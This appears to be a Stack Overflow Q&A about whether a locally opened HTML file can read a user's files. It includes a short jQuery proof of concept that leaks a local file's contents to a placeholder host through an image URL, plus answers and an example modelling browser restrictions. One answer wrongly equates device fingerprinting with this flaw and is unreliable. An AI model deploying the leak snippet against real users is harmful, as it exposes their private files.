Let's talk about security. It seems to me that, theoretically, I can get information from the file system of a user with some script, if the user opens an HTML file with it (opens it from his file system, not from the network). Look at the code:

info.txt:

my info

index.html:

<!doctype html>

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
    <script>
      $(document).ready(function () {
        $.get('file:///home/daz/desktop/info.txt', function (data) {
          $('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
        }, 'text');
      });
    </script>
  </head>
  <body></body>
</html>

Some browsers (Firefox, for example) allow you to get files from file:// through XMLHttpRequest, so if I guess the path to the file, then I can get its content by ajax. And then I can dynamically add an img tag with src leading to my domain with parameters in the query string. And the browser obediently makes a request GET ?data=my%20info%0A domain.com. And on the server side I can parse the query string and get the data.

Am I right that I can do this? Am I right that I can get a user's data from his computer if he opens my HTML file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: the user should use Firefox or something else with a similar configuration, and I cannot get files the user cannot access because of access rights).

UPDATED:

If it is possible, then why is it possible? Why do they allow you to do such things? Why are there no confirmation dialogs or something?

UPDATED 2:

It will be great if someone makes a review of this issue. Thanks in advance!

Asked Sep 8, 2012 at 4:55 by Danil Speransky; edited Sep 8, 2012 at 5:18

  • Yes, this is entirely possible. – Brad Commented Sep 8, 2012 at 5:14

2 Answers

It's less possible than you might think. Various browsers have implemented different restrictions on what local HTML files can do, as described in this post by the Chromium development team:

http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html

In particular:

  • Internet Explorer disables JavaScript in local HTML files by default
  • Opera places some restrictions on cross-domain access from local files
  • Firefox applies subdirectory restrictions to local file access

(Note that this post is from 2008; browsers -- especially Chrome -- may have changed significantly since then.)
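
The Firefox bullet in the answer above, sketched as an added example (not code from the answer, the linked post or Firefox). It assumes the restriction means "a local page may read only files in its own directory or below"; the function names and the sample paths other than the question's `info.txt` are hypothetical.

```javascript
// Added example: a simplified model of a "same directory or below" rule for
// pages opened from file://. The rule as coded and all names are assumptions.

// Parse a file: URL into decoded path segments; return null (deny) on anything odd.
function fileSegments(url, base) {
  let u;
  try { u = new URL(url, base); } catch (e) { return null; }
  if (u.protocol !== 'file:' || u.host !== '') return null;
  try {
    // The URL parser has already resolved ".", ".." and their %2e spellings.
    const segs = u.pathname.split('/').slice(1).map(decodeURIComponent);
    // An escaped separator or NUL could smuggle a second path inside one segment.
    return segs.some((s) => /[\/\\\0]/.test(s)) ? null : segs;
  } catch (e) {
    return null; // malformed percent-escape
  }
}

// May a page at pageUrl read targetUrl under the modelled rule?
function canLocalPageRead(pageUrl, targetUrl) {
  const page = fileSegments(pageUrl);
  const target = fileSegments(targetUrl, pageUrl); // relative targets resolve against the page
  if (!page || !target) return false;
  const dir = page.slice(0, -1); // directory holding the page
  // Compare whole segments, so /home/daz/desk never matches /home/daz/desktop.
  return target.length > dir.length && dir.every((s, i) => s === target[i]);
}

// Constructed sample: the question's target file, page opened from several places.
const TARGET = 'file:///home/daz/desktop/info.txt';
const cases = [
  'file:///home/daz/desktop/index.html',
  'file:///home/daz/index.html',
  'file:///home/daz/Downloads/index.html',
];
for (const page of cases) {
  console.log(page, '->', canLocalPageRead(page, TARGET) ? 'readable' : 'blocked');
}
```

Under this rule a page saved high in the home directory reaches everything beneath it, so the directory from which untrusted HTML is opened decides how much is exposed.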

Just an update: corporations are now using this exploit to steal the information of millions of users, tracking them without their knowledge and without using cookies. http://en.wikipedia.org/wiki/Device_fingerprint

It seems this flaw was intentionally left in there just so users could be exploited.
